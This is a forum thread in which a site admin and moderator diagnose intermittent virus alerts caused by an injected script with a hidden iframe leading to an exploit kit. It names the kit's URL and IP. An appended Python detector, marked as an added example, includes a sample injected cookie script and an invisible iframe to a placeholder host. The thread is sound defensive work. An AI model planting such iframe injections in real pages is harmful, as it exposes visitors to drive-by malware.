Need help: People getting Virus alert on site....

Status
Not open for further replies.

Dragon

New User
David
I just logged in and got two virus warnings from Avast and it blocked whatever it is/was that was out there.
 

sawduster

New User
Robert
Just got me again... I just opened my browser; I was not logged on. I looked at a thread and came back and it did it again. If the past is any indication it will not happen again this session.

I have no clue how to find this source code thinger you need :embaresse

I really appreciate how hard you are working to try and fix this Jim :notworthy:
 

Rob

New User
Rob
I got this today Jim, from AVG. okelkas.co.cc/okelkas5/traffit.php exploit SEP Exploit Kit (type 1337)

Can't find any info on it though. Did not get it last night with my laptop running McAfee. Both using firefox.
 

froglips

New User
Jim Campbell
I'm trying really hard, so please bear with me.....

I've not been able to uncover anything on our server. But there are a goodly number of reports of malicious ads over the past few days. Some big players were hit. My guess is we are part of that situation.

I suspect that the reason we are getting these intermittent traps is the intermittent nature of the ads.

I'll keep working on this, and keep reporting what you find.

The usual warnings apply. Never install anything that appears to have been prompted to from our site and keep those virus scanners running.

Thanks,
Jim
 

froglips

New User
Jim Campbell
I've been given permission to turn off our Google Ads for 24 hours.

Let's see if that helps.

Thanks to BasicDad for capturing some page source for me. It appears a cookie/script is being inserted before our website code. Not sure what to make of that.

For those interested, in Firefox you can right click your mouse and pick the option "View Source", then cut and paste it into an email to me.

Sorry, don't know how it's done in IE.

Jim
 

ehpoole

Moderator
Ethan
WARNING: Some of the URLs that follow lead to a known malicious toolkit (a.k.a. virus). The only SAFE LINK to click on below is that referring you to www.symantec.com -- click wisely!

The actual code for the toolkit follows:

-- Froglips removed code, if you want to see a copy, just ask. --

Which, as mentioned earlier, is getting prepended to the normal HTTP response. The source of the infection originates with -- Froglips removed link to bad guys -- at 85.114.143.47 and which forwards the browser to yet another URL: -- froglips removed link to bad guys -- (also at 85.114.143.47). This is a known malicious toolkit; for more information, please visit:

http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=50031

This is a frustratingly intermittent issue. In 8 hours' time I only managed to encounter it once (at 3:35am Eastern) and (annoyingly, due to a typo) only captured half the tcpdump for analysis, despite several thousand reloads of the NCWW homepage.

Because it is getting inserted at the beginning of a TCP session, this leads me to suggest that either the HTTP daemon has suffered a buffer overflow (and, as such, is in need of shutdown, patching, and finally a restart once patched) OR NCWW's web presence provider has a higher-level infected server (in the case of a shared virtual server) or router. Of these, an http daemon infected by means of a buffer overflow is the most likely explanation.

If these were servers in physical possession this would be far easier to confirm; with remotely managed servers things can get complicated by restrictions the provider may have in place, particularly on shared servers.

Best of luck!

EDIT: Admins, if you know how to get vbulletin to NOT hyperlink the harmful URLs I would appreciate the edit. I originally created the above with the URL hyperlinks REMOVED. Unfortunately, when submitted vBulletin overrode my directives and turned them back into hyperlinked URLs... READERS SHOULD EXERCISE EXTRA CAUTION AS A RESULT!!!
 

ehpoole

Moderator
Ethan
For those interested, in Firefox you can right click your mouse and pick the option "View Source", then cut and paste it into an email to me.

Sorry, don't know how it's done in IE.

To view source in Internet Explorer, one may right-click, then select 'View Source' from the popup menu. A dialog window will then open displaying the source code for the given page. From there you may select 'File/Save/HTML Source' to save the source code to a file.
 

froglips

New User
Jim Campbell
Thanks! We are getting closer!

I now see this code when I am not logged into the site. As soon as I log in, the bad code "is gone".

So far, I cannot find any evidence it's coming from within our code.

I'll take your suggestions and start looking up the ladder.

Jim

p.s. I edited Ethan's post to remove links and code to the evil doers. But, if you'd like to see it, drop me a PM and I'll share it. Probably being paranoid, but I tell you, they really are following me!!
 

ehpoole

Moderator
Ethan
In terms of sheer probability, the code is almost certainly being inserted by a compromised http daemon. Since the infection would exist only in memory (RAM), the file system will pass any antivirus scans with ease. Even a scan of system memory will likely pass, since the inserted code is not a virus per se (it just creates a cookie and sets up an invisible IFRAME). It's the URL the IFRAME code points to that actually returns the malicious toolkit that is causing us all this trouble.

In the short term, stopping and restarting the http daemon will likely clear things up, but no telling how much time may pass before it becomes reinfected until the hole is patched.

Again, good luck and I hope some of this helps to get you pointed in the proper direction. The randomness of this infection makes it very frustrating to track down.
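The thread describes the symptom twice: Jim notes that a cookie/script is being inserted before the site's own HTML, and Ethan explains that the injected snippet plants a cookie and opens an invisible IFRAME pointing at the exploit-kit URL. The script below is an added example (not code from the forum, the site, or any poster) that checks a saved page source for exactly those three symptoms: foreign markup before `<!DOCTYPE>`/`<html>`, an iframe sized or styled to be invisible, and an inline script writing `document.cookie`. Both sample responses are constructed; the hostnames in them are placeholders, not the ones mentioned in the thread.

```python
"""Flag the injection symptoms described in the thread in a saved page source.
Added example; all sample input below is constructed."""
import re
from html.parser import HTMLParser

# Constructed sample of an infected response: foreign markup sits in front of
# the real page. Hostnames are placeholders, not those from the thread.
INFECTED_SAMPLE = (
    '<script>document.cookie="seen=1; path=/";</script>'
    '<iframe src="http://malicious.example/path.php" width="1" height="1" '
    'style="visibility:hidden"></iframe>'
    '<!DOCTYPE html><html><head><title>NCWW</title></head><body>ok</body></html>'
)

# Constructed clean response: a normally sized ad iframe is legitimate.
CLEAN_SAMPLE = (
    '<!DOCTYPE html><html><head><title>NCWW</title></head>'
    '<body><iframe src="https://ads.example/slot" width="300" height="250">'
    '</iframe></body></html>'
)


class _Collector(HTMLParser):
    """Record every iframe's attributes and the body of every <script>."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _is_hidden(attrs):
    """An iframe sized to 0/1 px or styled invisible is not meant to be seen."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = lambda v: v is not None and v.strip().rstrip("px") in ("0", "1")
    return (tiny(attrs.get("width")) and tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def scan_response(body):
    """Return a list of finding strings for one HTTP response body."""
    findings = []
    # 1. Anything before the document's own opening is foreign to the site.
    m = re.search(r"<!doctype\s|<html[\s>]", body, re.IGNORECASE)
    prefix = body[:m.start()] if m else ""
    if prefix.strip():
        findings.append("prepended content before <!DOCTYPE>/<html>: %r" % prefix[:60])
    col = _Collector()
    col.feed(body)
    # 2. Invisible iframes are the loader for the kit URL.
    for attrs in col.iframes:
        if _is_hidden(attrs):
            findings.append("hidden iframe -> %s" % attrs.get("src"))
    # 3. Inline cookie writes mark a visitor as already served.
    for text in col.scripts:
        if re.search(r"document\.cookie\s*=", text):
            findings.append("inline script sets a cookie")
    return findings


if __name__ == "__main__":
    for name, sample in (("infected", INFECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, scan_response(sample) or "no findings")
```

Run it against the source saved with "View Source" (read the file and pass its contents to `scan_response`). Because the thread reports the injection only appears for visitors who are not logged in, check a capture taken from a logged-out session; a clean result from a logged-in one proves nothing.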
 

froglips

New User
Jim Campbell
Thanks, I did recycle our httpd and the issue persists.

I now have our hosting provider support staff looking into it as well.

Fingers crossed all around....

Jim
 